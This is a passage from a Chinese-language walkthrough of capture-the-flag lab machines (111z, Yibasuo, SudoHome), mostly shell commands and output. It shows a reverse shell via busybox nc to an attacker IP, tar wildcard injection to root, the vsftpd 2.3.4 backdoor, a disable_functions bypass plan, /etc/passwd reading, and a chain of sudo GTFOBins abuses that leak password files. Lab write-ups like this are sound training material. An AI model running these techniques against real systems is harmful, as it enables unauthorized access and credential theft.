    [26] => vmlinuz
    [27] => vmlinuz.old
)
root:x:0:0:root:\/root:\/bin\/bash
daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin
bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin
sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin
sync:x:4:65534:sync:\/bin:\/bin\/sync
games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin
man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin
lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin
mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin
news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin
uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin
proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin
www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin
backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin
list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin
irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin
nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin
_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin
systemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin
systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin
messagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin
sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin
ll:x:1000:1000::\/home\/ll:\/bin\/bash
mj:x:1001:1001::\/home\/mj:\/bin\/bash<\/pre>\n\n\n\n
?1=\/&2=\/etc\/passwd<\/pre>\n\n\n\n
\u626b\u63cf\u76ee\u5f55<\/p>\n\n\n\n
?1=\/opt&2=\/opt\/ll*<\/pre>\n\n\n\n
Array
(
    [0] => .
    [1] => ..
    [2] => backup
    [3] => llpass.txt
)
ll:Bp2tFMYfElkoMWlOUsOD1C30<\/pre>\n\n\n\n
\u65b9\u6848\u4e09<\/h4>\n\n\n\n
\u8fd8\u662f\u4e0a\u9762\u7684\u90a3\u4e2a\u53d1\u73b0\u6267\u884c\u4e0d\u4e86\u547d\u4ee4\uff0c\u8bd5\u8bd5phpinfo();\uff0c\u53d1\u73b0\u56de\u663e<\/p>\n\n\n\n
disable_functions<\/strong><\/p>\n\n\n\n
    pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,system<\/pre>\n\n\n\n
\u56e0\u4e3aphp\u914d\u7f6e\u6587\u4ef6\u7981\u7528\u4e86\u51e0\u4e4e\u6240\u6709\u547d\u4ee4\u6267\u884c\u51fd\u6570\uff0c\u5982\u679c \/tmp \u76ee\u5f55\u53ef\u5199\uff0c\u5e76\u4e14 putenv \u3001mail\u3001error_log<\/p>\n\n\n\n
\u51fd\u6570\u53ef\u7528\uff0c\u53ef\u4ee5\u5728 \/tmp \u4e0a\u4f20\u6076\u610f\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\uff0c\u5229\u7528 putenv \u51fd\u6570\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u518d\u901a\u8fc7 mail \u6216<\/p>\n\n\n\n
error_log \u51fd\u6570\u5f00\u542f\u4e00\u4e2a\u5b50\u8fdb\u7a0b\u52a0\u8f7d\u6076\u610f\u52a8\u6001\u94fe\u63a5\u5e93\uff0c\u4ece\u800c\u5b9e\u73b0\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n
\u53ef\u4ee5\u76f4\u63a5\u5229\u7528 \u4e2d\u56fd\u8681\u5251 \u7684\u63d2\u4ef6\u6765\u5b9e\u73b0\u7ed5\u8fc7 disable_functions \u8f85\u52a9\u5de5\u5177=>\u7ed5\u8fc7 disable functions-192.168.3.128\u7136\u540e\u5728\u4f20\u5c0f\u9a6c<\/p>\n\n\n\n
\u7136\u540e\u5c31\u548c\u4e4b\u524d\u7684\u4e00\u6837\uff0c\u67e5\u5bc6\u7801<\/p>\n\n\n\n
\u63d0\u6743<\/h3>\n\n\n\n
sudo\u63d0\u6743\u53d1\u73b0\u53ef\u4ee5\u4ee5\u65e0\u5bc6\u7801\u7684\u65b9\u5f0f\u4f7f\u7528mj\u7528\u6237\u4e0b\u9762\u7684neofetch\u547d\u4ee4<\/p>\n\n\n\n
ll@111z:\/home$ sudo -l
Matching Defaults entries for ll on 111z:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User ll may run the following commands on 111z:
    (mj) NOPASSWD: \/usr\/bin\/neofetch<\/pre>\n\n\n\n
https:\/\/gtfobins.github.io\/gtfobins\/neofetch\/#shell<\/pre>\n\n\n\n
ll@111z:\/home$ echo 'exec bash' > \/tmp\/config.txt
ll@111z:\/home$ sudo -u mj \/usr\/bin\/neofetch --config \/tmp\/config.txt
mj@111z:\/home$ ls
ll  mj
mj@111z:\/home$ cd .\/mj
mj@111z:~$ ls
user.txt
mj@111z:~$ cat u*
flag{user-5450dba90b514d69935be5eafbfd0077}<\/pre>\n\n\n\n
mj@111z:~$ sudo -l
Matching Defaults entries for mj on 111z:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User mj may run the following commands on 111z:
    (root) NOPASSWD: \/opt\/backup\/backup.sh
mj@111z:~$ cat \/opt\/backup\/backup.sh
#!\/bin\/bash
# \u7f51\u7ad9\u4e0a\u4f20\u6587\u4ef6\u5907\u4efd\u811a\u672c
\u200b
cd \/var\/www\/html\/uploads
tar czf \/tmp\/backup.tar.gz *
echo \"Backup completed\"<\/pre>\n\n\n\n
\u53d1\u73b0\u8fd9\u4e2ash\u6587\u4ef6\u4f7f\u7528\u901a\u914d*<\/p>\n\n\n\n
https:\/\/www.freebuf.com\/articles\/system\/176255<\/pre>\n\n\n\n
\u7136\u540e\u5c31\u76f4\u63a5<\/p>\n\n\n\n
cd \/var\/www\/html\/uploads
mj@111z:\/var\/www\/html\/uploads$ echo '' > '--checkpoint-action=exec=sh shell.sh'
mj@111z:\/var\/www\/html\/uploads$ echo '' > '--checkpoint=1'
mj@111z:\/var\/www\/html\/uploads$ echo -e '#!\/bin\/bash\\ncp \/bin\/bash \/var\/www\/html\/uploads\/bash\\nchmod u+s
> \/var\/www\/html\/uploads\/bash' > shell.sh
mj@111z:\/var\/www\/html\/uploads$ sudo \/opt\/backup\/backup.sh
cp: cannot create regular file '\/var\/www\/html\/uploads\/bash': Text file busy
chmod: missing operand after 'u+s'
Try 'chmod --help' for more information.
root@111z:\/var\/www\/html\/uploads# id
uid=0(root) gid=0(root) groups=0(root)
\u62ff\u4e0broot\u4e86<\/pre>\n\n\n\n
yibasuo<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
\u6253\u5f00\u9776\u673a\uff0c\u7136\u540e\u8fdb\u884c\u4fe1\u606f\u641c\u96c6<\/p>\n\n\n\n
sudo arp-scan -I eth0 192.168.3.0\/24<\/pre>\n\n\n\n
\u53d1\u73b0\u9776\u673a\u5730\u5740 \uff1a<\/p>\n\n\n\n
192.168.3.248<\/p>\n\n\n\n
fscan\u626b\u4e00\u4e0b192.168.3.248<\/p>\n\n\n\n
fscan.exe -h 192.168.3.248\/windows  .\/fscan -h 192.168.3.248 \/linux<\/pre>\n\n\n\n
nmap \u626b\u4e00\u4e0b<\/p>\n\n\n\n
\u53d1\u73b021(ftp) 22(ssh) 80(http)\u7aef\u53e3\uff0c\u4f7f\u7528<\/p>\n\n\n\n
ftp 192.168.3.248 21 \u8fde\u63a5<\/pre>\n\n\n\n
\u56e0\u4e3a\u5728\u626b\u63cf\u7684\u8fc7\u7a0b\u91cc\u9762\u662f\u533f\u540d\u767b\u5f55\uff0c\u4f7f\u7528name\u4e3aanonymous \u5bc6\u7801\u4e3a\u7a7a\uff0c\u76f4\u63a5\u6572\u56de\u8f66<\/p>\n\n\n\n
\u4e0b\u8f7d\u5230\u672c\u5730<\/p>\n\n\n\n
get creds.txt<\/pre>\n\n\n\n
\u7136\u540ecat\u4e00\u4e0b\u53d1\u73b0\u662f\u9519\u7684\uff0c\u7136\u540e\u53d1\u73b0\u8fd9\u91cc\u6709\u4e2a\u4fe1\u606f<\/p>\n\n\n\n
220 (vsFTPd 2.3.4)<\/pre>\n\n\n\n
\u641c\u7d22\u4e00\u4e0b<\/p>\n\n\n\n
https:\/\/blog.csdn.net\/m0_62670778\/article\/details\/138683346<\/pre>\n\n\n\n
\u4e0d\u8fc7\u4f7f\u7528\u5de5\u5177\u65e0\u6cd5<\/p>\n\n\n\n
\u5230\u8fbe\u3002<\/p>\n\n\n\n
\u7136\u540e<\/p>\n\n\n\n
ftp 192.168.3.248 21
name:anonymous:)
pass:\u76f4\u63a5\u56de\u8f66
\u53d1\u73b0\u662f\u4e0d\u884c\u7684<\/pre>\n\n\n\n
\u7136\u540e\u5c31\u67e5\u770b80\u7aef\u53e3\uff0c\u53d1\u73b0\u662f\u767b\u5f55\u9875\u9762\uff0c\u76f4\u63a5\u7206\u7834 admin\/password123<\/p>\n\n\n\n
\u767b\u5f55\u8fdb\u53bb\uff0c\u53d1\u73b0\u5b58\u5728\u8fdb\u884c\u8f93\u5165\u547d\u4ee4\u7684\u5730\u65b9\uff0c\u4e0d\u8fc7\u6709\u7684\u662f\u5b58\u5728\u4e0d\u6388\u6743\u7684<\/p>\n\n\n\n
ls \/usr\/bin<\/pre>\n\n\n\n
ls \/usr\/bin > file.txt<\/pre>\n\n\n\n
\u7206\u7834\u53d1\u73b0bosybox\u6709\u6743\u9650<\/p>\n\n\n\n
\u76f4\u63a5\u8f93\u5165\u547d\u4ee4 \u8fdb\u884c\u53cd\u5f39shell
busybox nc 192.168.3.236 8888 -e \/bin\/bash<\/pre>\n\n\n\n
\u53cd\u5f39\u6210\u529f<\/p>\n\n\n\n
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null \u7a33\u5b9ashell<\/pre>\n\n\n\n
\u7136\u540e\u5c31\u662f<\/p>\n\n\n\n
www-data@Yibasuo:\/var\/www\/html\/secure$ cd \/home
cd \/home
www-data@Yibasuo:\/home$ ls
ls
ftp  todd
www-data@Yibasuo:\/home$ cd .\/tod
cd .\/tod
bash: cd: .\/tod: No such file or directory
www-data@Yibasuo:\/home$ cd .\/todd
cd .\/todd
www-data@Yibasuo:\/home\/todd$ cat u*
cat u*
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
\u5728\u4e4b\u524d\u8bf4\u8fc7\u6709\u4e2a\u6f0f\u6d1e\u6ca1\u6709\u6253\uff0c\u4f46\u662f\u90a3\u4e2a\u6f0f\u6d1e\u662f\u6253\u8fdb\u53bb\uff0c\u4e0d\u8fc7\u6ca1\u6709\u6743\u9650\u53bb\u5229\u7528\uff0c\u7136\u540e\u8fdb\u5165\u5185\u90e8\u4e86\uff0css -lntup\u4e00\u4e0b\u53d1\u73b06200\u7aef\u53e3\u5f00\u653e\uff0c<\/p>\n\n\n\n
6200\u7aef\u53e3\u662f\u5199\u5165\u4e1c\u897f\u4e86\uff0c\u76f4\u63a5\u76d1\u542c\u53cd\u5f39shell\uff0c\u62ff\u4e0broot<\/p>\n\n\n\n
www-data@Yibasuo:\/var\/www\/html\/secure$ ss -lntup
ss -lntup
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   
udp     UNCONN   0        0                0.0.0.0:68            0.0.0.0:*      
tcp     LISTEN   0        32               0.0.0.0:21            0.0.0.0:*      
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        100              0.0.0.0:6200          0.0.0.0:*      
tcp     LISTEN   0        128                    *:80                  *:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      
www-data@Yibasuo:\/var\/www\/html\/secure$ busybox nc 127.0.0.1 6200
busybox nc 127.0.0.1 6200
ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd \/root  
cd \/root
ls
ls
root.txt
cat root.txt
cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40} <\/pre>\n\n\n\n
\u7b2c\u4e00\u6b21\u5728\u8fd8\u662f\u9776\u673a\u671f\u95f4\u62ff\u4e0broot\uff0c\u723d\ud83d\ude01\ud83d\ude01\ud83d\ude01<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\uff1f\uff1f\uff1f<\/p>\n\n\n\n
Sudohome<\/h2>\n\n\n\n
user1<\/h3>\n\n\n\n
\u6253\u5f00\u9776\u673a\uff0c\u626b\u63cf\u51fa\u676580\u7aef\u53e3\u548c21\u4ee5\u53ca25\u7aef\u53e3<\/p>\n\n\n\n
\u2514\u2500# nmap  192.168.3.142                 
Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-11-24 19:30 CST
Nmap scan report for 192.168.3.142
Host is up (0.0011s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
22\/tcp open  ssh
25\/tcp open  smtp
80\/tcp open  http
MAC Address: 08:00:<\/pre>\n\n\n\n
\u770b\u770b25\u7aef\u53e3\uff0c\u53d1\u73b0\u6ca1\u4ec0\u4e48\u4f5c\u7528\uff0c\u5c31\u67e5\u770b\u4e00\u4e0b80\u7aef\u53e3<\/p>\n\n\n\n
curl 192.168.3.142
<--try ssh--><\/pre>\n\n\n\n
\u90a3\u5c31\u8fdc\u7a0b\u8fde\u63a5\u770b\u770b<\/p>\n\n\n\n
ssh ll@192.168.3.142
user1:0woA8Sr7I83R0ZwmnTcH
\u53d1\u73b0\u7206\u7528\u6237\u548c\u5bc6\u7801\u4e86<\/pre>\n\n\n\n
\u76f4\u63a5\u8fdc\u7a0b\u8fde\u63a5<\/p>\n\n\n\n
user1@SudoHome:~$ ls
password.txt
user1@SudoHome:~$ sudo -l
Matching Defaults entries for user1 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user1 may run the following commands on SudoHome:
    (user2) NOPASSWD: \/usr\/bin\/du<\/pre>\n\n\n\n
user2<\/h3>\n\n\n\n
\u53d1\u73b0\u53ef\u4ee5\u65e0\u5bc6\u7801\u6267\u884cuser2\u7684du\u547d\u4ee4<\/p>\n\n\n\n
user1@SudoHome:~$ sudo -u user2 \/usr\/bin\/du --help
Usage: \/usr\/bin\/du [OPTION]... [FILE]...
  or:  \/usr\/bin\/du [OPTION]... --files0-from=F
Summarize disk usage of the set of FILEs, recursively for directories.
\u200b
Mandatory arguments to long options are mandatory for short options too.
  -0, --null            end each output line with NUL, not newline
  -a, --all             write counts for all files, not just directories
      --apparent-size   print apparent sizes, rather than disk usage; although
                          the apparent size is usually smaller, it may be
                          larger due to holes in ('sparse') files, internal
                          fragmentation, indirect blocks, and the like
  -B, --block-size=SIZE  scale sizes by SIZE before printing them; e.g.,
                           '-BM' prints sizes in units of 1,048,576 bytes;
                           see SIZE format below
  -b, --bytes           equivalent to '--apparent-size --block-size=1'
  -c, --total           produce a grand total
  -D, --dereference-args  dereference only symlinks that are listed on the
                          command line
  -d, --max-depth=N     print the total for a directory (or file, with --all)
                          only if it is N or fewer levels below the command
                          line argument;  --max-depth=0 is the same as
                          --summarize
      --files0-from=F   summarize disk usage of the
                          NUL-terminated file names specified in file F;
                          if F is -, then read names from standard input
  -H                    equivalent to --dereference-args (-D)
  -h, --human-readable  print sizes in human readable format (e.g., 1K 234M 2G)
      --inodes          list inode usage information instead of block usage
  -k                    like --block-size=1K
  -L, --dereference     dereference all symbolic links
  -l, --count-links     count sizes many times if hard linked
  -m                    like --block-size=1M
  -P, --no-dereference  don't follow any symbolic links (this is the default)
  -S, --separate-dirs   for directories do not include size of subdirectories
      --si              like -h, but use powers of 1000 not 1024
  -s, --summarize       display only a total for each argument
  -t, --threshold=SIZE  exclude entries smaller than SIZE if positive,
                          or entries greater than SIZE if negative
      --time            show time of the last modification of any file in the
                          directory, or any of its subdirectories
      --time=WORD       show time as WORD instead of modification time:
                          atime, access, use, ctime or status
      --time-style=STYLE  show times using STYLE, which can be:
                            full-iso, long-iso, iso, or +FORMAT;
                            FORMAT is interpreted like in 'date'
  -X, --exclude-from=FILE  exclude files that match any pattern in FILE
      --exclude=PATTERN    exclude files that match PATTERN
  -x, --one-file-system    skip directories on different file systems
      --help     display this help and exit
      --version  output version information and exit
\u200b
Display values are in units of the first available SIZE from --block-size,
and the DU_BLOCK_SIZE, BLOCK_SIZE and BLOCKSIZE environment variables.
Otherwise, units default to 1024 bytes (or 512 if POSIXLY_CORRECT is set).
\u200b
The SIZE argument is an integer and optional unit (example: 10K is 10*1024).
Units are K,M,G,T,P,E,Z,Y (powers of 1024) or KB,MB,... (powers of 1000).
\u200b
GNU coreutils online help: <https:\/\/www.gnu.org\/software\/coreutils\/>
Full documentation at: <https:\/\/www.gnu.org\/software\/coreutils\/du>
or available locally via: info '(coreutils) du invocation'<\/pre>\n\n\n\n
 --files0-from=F   summarize disk usage of the
                          NUL-terminated file names specified in file F;
                          if F is -, then read names from standard input<\/pre>\n\n\n\n
\u4fe1\u606f\u662f\u8fd9\u4e2a\u6587\u4ef6\u540d\u4ee5ASCII NUL\u5b57\u7b26\uff08\u5373\\0\uff09\u5206\u9694\u7684\u95ee\u9898\uff0c\u53ef\u4ee5\u4ece\u6587\u4ef6F\u4e2d\u8bfb\u53d6\u6587\u4ef6\u540d\u5217\u8868\uff0c\u907f\u514d\u4e86 \u201c\u6587\u4ef6\u540d\u542b\u7a7a\u683c\u3001\u6362\u884c\u201d \u5bfc\u81f4\u7684\u89e3\u6790\u9519\u8bef\u3002\u4f46\u662f\u5f53\u8be5F\u6587\u4ef6\u662f\u4e00\u4e2a\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u4f8b\u5982password.txt\u91cc\u9762\u7684\u5185\u5bb9\uff0c\u8fd9\u4e2a\u6587\u4ef6\u540d\u662f\u6ca1\u6709\u7684\u5c31\u4f1a\u53bb\u62a5\u9519\uff0c\u5e76\u4e14\u8bf4\u660e\u8fd9\u4e2a\u6587\u4ef6\u662f\u4e0d\u5b58\u5728\u7684\uff0c\u4f46\u662f\u62a5\u9519\u4f1a\u628a\u6587\u4ef6\u540d\u7ed9\u8bfb\u51fa\u6765\uff0c\u4e5f\u5c31\u662f\u4e0a\u9762\u6587\u4ef6\u7684\u5185\u5bb9<\/p>\n\n\n\n
sudo -u user2 \/usr\/bin\/du --files0-from=\/home\/user2\/password.txt<\/pre>\n\n\n\n
user1@SudoHome:~$ sudo -u user2 \/usr\/bin\/du --files0-from=\/home\/user2\/password.txt
\/usr\/bin\/du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\\n': No such file or directory<\/pre>\n\n\n\n
user3<\/h3>\n\n\n\n
user2@SudoHome:~$ sudo -l
Matching Defaults entries for user2 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user2 may run the following commands on SudoHome:
    (user3) NOPASSWD: \/usr\/bin\/file<\/pre>\n\n\n\n
\u67e5\u770b\u8be5\u547d\u4ee4\u7684\u4f5c\u7528<\/p>\n\n\n\n
sudo -u user2 \/usr\/bin\/du --help<\/pre>\n\n\n\n
https:\/\/gtfobins.github.io\/gtfobins\/file\/#file-read \u4e0d\u8fc7\u53ef\u4ee5\u76f4\u63a5\u641c\u8fd9\u4e2a\u547d\u4ee4\u600e\u4e48\u53bb\u63d0\u6743<\/pre>\n\n\n\n
LFILE=file_to_read
sudo file -f $LFILE<\/pre>\n\n\n\n
user2@SudoHome:~$ sudo -u user3 \/usr\/bin\/file -f \/home\/user3\/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)<\/pre>\n\n\n\n
user4<\/h3>\n\n\n\n
user3@SudoHome:~$ sudo -l
Matching Defaults entries for user3 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user3 may run the following commands on SudoHome:
    (user4) NOPASSWD: \/usr\/bin\/mc<\/pre>\n\n\n\n
user3@SudoHome:~$ mc -help
Usage:
  mc [OPTION\u2026] [this_dir] [other_panel_dir]
\u200b
GNU Midnight Commander 4.8.26
\u200b
\u200b
Help Options:
  -h, --help                Show help options
  --help-all                Show all help options
  --help-terminal           Terminal options
  --help-color              Color options
\u200b
Application Options:
  -V, --version             Displays the current version
  -f, --datadir             Print data directory
  -F, --datadir-info        Print extended info about used data directories
  --configure-options       Print configure options
  -P, --printwd=<file>      Print last working directory to specified file
  -U, --subshell            Enables subshell support (default)
  -u, --nosubshell          Disables subshell support
  -l, --ftplog=<file>       Log ftp dialog to specified file
  -v, --view=<file>         Launches the file viewer on a file
  -e, --edit=<file> ...     Edit files
\u200b
\u200b
Please send any bug reports (including the output of 'mc -V')
\u200b<\/pre>\n\n\n\n
\u67e5\u770b\u4e00\u4e0bmc\u547d\u4ee4\u662f\u505a\u4ec0\u4e48\u7684<\/p>\n\n\n\n
\u800c\u5728 -u \u4e4b\u540e\u4f1a\u8fdb\u5165\u4ea4\u4e92\u5f0fshell<\/p>\n\n\n\n
-u, --nosubshell          Disables subshell support<\/pre>\n\n\n\n
user@SudoHome:\/home\/user3$<\/pre>\n\n\n\n
\u53d1\u73b0\u662f\u8fd9\u6837\u7684\uff0c\u8f93\u5165whoami\u547d\u4ee4\u518d\u9000\u51fa\u53d1\u73b0\u56de\u663e\u7684\u662fuser4<\/p>\n\n\n\n
\u76f4\u63a5\u8fdb\u5165cat \/home\/user4\/password.txt<\/pre>\n\n\n\n
\u53d1\u73b0\u6210\u529f<\/p>\n\n\n\n
user4@SudoHome:\/home\/user3$ whoami
user4
\u200b
user4@SudoHome:\/home\/user3$ cat \/home\/user4\/password.txt
B0aWh2XHpp5hOIVtCUbn<\/pre>\n\n\n\n
user5<\/h3>\n\n\n\n
user4@SudoHome:~$ sudo -l
Matching Defaults entries for user4 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user4 may run the following commands on SudoHome:
    (user5) NOPASSWD: \/usr\/bin\/ssh
\u53d1\u73b0\u662fssh<\/pre>\n\n\n\n
user4@SudoHome:~$ ssh --help
unknown option -- -
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
           [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
           [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
           [-i identity_file] [-J [user@]host[:port]] [-L address]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-Q query_option] [-R address] [-S ctl_path] [-W host:port]
           [-w local_tun[:remote_tun]] destination [command]
\u200b<\/pre>\n\n\n\n
https:\/\/gtfobins.github.io\/gtfobins\/ssh\/#sudo<\/pre>\n\n\n\n
user4@SudoHome:~$ sudo  -u  user5 \/usr\/bin\/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ ls
password.txt
$ cat \/home\/user5\/password.txt
GZ5KErjFycaYHZGj7GcI<\/pre>\n\n\n\n
user6<\/h3>\n\n\n\n
user5@SudoHome:~$ sudo -l
Matching Defaults entries for user5 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user5 may run the following commands on SudoHome:
    (user6) NOPASSWD: \/usr\/bin\/rev<\/pre>\n\n\n\n
https:\/\/gtfobins.github.io\/gtfobins\/rev\/#sudo
user5@SudoHome:~$ sudo -u user6 \/usr\/bin\/rev \/home\/user6\/password.txt | rev
Z5cWU36wQhxAVGJbGwoL<\/pre>\n\n\n\n
user7<\/h3>\n\n\n\n
user6@SudoHome:~$ sudo -l
Matching Defaults entries for user6 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user6 may run the following commands on SudoHome:
    (user7) NOPASSWD: \/usr\/bin\/cp<\/pre>\n\n\n\n
user6@SudoHome:\/home\/user7$ ls -al
total 24
drwxr-xr-x  2 user7 user7 4096 Nov 16 08:35 .
drwxr-xr-x 12 root  root  4096 Nov 16 08:35 ..
-rw-r--r--  1 user7 user7  220 Apr 18  2019 .bash_logout
-rw-r--r--  1 user7 user7 3526 Apr 18  2019 .bashrc
-rw-------  1 user7 user7   21 Nov 16 08:35 password.txt
-rw-r--r--  1 user7 user7  807 Apr 18  2019 .profile
\u53d1\u73b0.profile\u662f\u53ef\u8bfb<\/pre>\n\n\n\n
https:\/\/gtfobins.github.io\/gtfobins\/cp\/#suid
user6@SudoHome:\/home\/user7$ sudo -u user7 \/usr\/bin\/cp \/home\/user7\/password.txt \/home\/user7\/.profile
user6@SudoHome:\/home\/user7$ cat .pro*
HLoKAOu86miWIYKdyVx3<\/pre>\n\n\n\n
user8<\/h3>\n\n\n\n
user7@SudoHome:~$ sudo -l
Matching Defaults entries for user7 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user7 may run the following commands on SudoHome:
    (user8) NOPASSWD: \/usr\/bin\/mail<\/pre>\n\n\n\n
user7@SudoHome:~$ touch \/tmp\/111
user7@SudoHome:~$ sudo -u user8 \/usr\/bin\/mail -f \/tmp\/111
Mail version 8.1.2 01\/15\/2001.  Type ? for help.
\"\/tmp\/111\": 0 messages [Read only]
& !\/bin\/bash
user8@SudoHome:\/home\/user7$ cat \/home\/user8\/password.txt
UxeGoUq8xqBRxyWVQPYK<\/pre>\n\n\n\n
user9<\/h3>\n\n\n\n
user8@SudoHome:~$ sudo -l
Matching Defaults entries for user8 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user8 may run the following commands on SudoHome:
    (user9) NOPASSWD: \/usr\/bin\/wfuzz
wfuzz\u662f\u4e00\u4e2a\u5173\u4e8e\u6a21\u7cca\u6d4b\u8bd5\u7684\u5de5\u5177\uff0c\u6587\u4ef6\u4e2d\u7684\u4e00\u884c\u5185\u5bb9\u4f1a\u4f5c\u4e3a FUZZ \u7684 payload\uff0cwfuzz \u4f1a\u5728\u8f93\u51fa\u8868\u683c\u7684 Payload \u5217\u91cc\u539f\u6837\u6253\u5370\u8fd9\u4e00\u884c\uff0c\u4ece\u800c\u6cc4\u9732\u5bc6\u7801\u3002<\/pre>\n\n\n\n
user8@SudoHome:~$ sudo -u user9 \/usr\/bin\/wfuzz -w \/home\/user9\/password.txt http:\/\/127.0.0.1\/FUZZ
 \/usr\/lib\/python3\/dist-packages\/wfuzz\/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
\u200b
Target: http:\/\/127.0.0.1\/FUZZ
Total requests: 1
\u200b
=====================================================================
ID           Response   Lines    Word       Chars       Payload                  
=====================================================================
\u200b
000000001:   404        9 L      31 W       271 Ch      \"peqkSBCDKvVxxNwcq1j4\"   
\u200b
Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests\/sec.: 0<\/pre>\n\n\n\n
user10<\/h3>\n\n\n\n
user9@SudoHome:~$ sudo -l
Matching Defaults entries for user9 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user9 may run the following commands on SudoHome:
    (user10) NOPASSWD: \/usr\/bin\/md5sum<\/pre>\n\n\n\n
md5sum<\/p>\n\n\n\n
user9@SudoHome:~$ sudo -u user10 \/usr\/bin\/md5sum --help
Usage: \/usr\/bin\/md5sum [OPTION]... [FILE]...
Print or check MD5 (128-bit) checksums.
\u200b
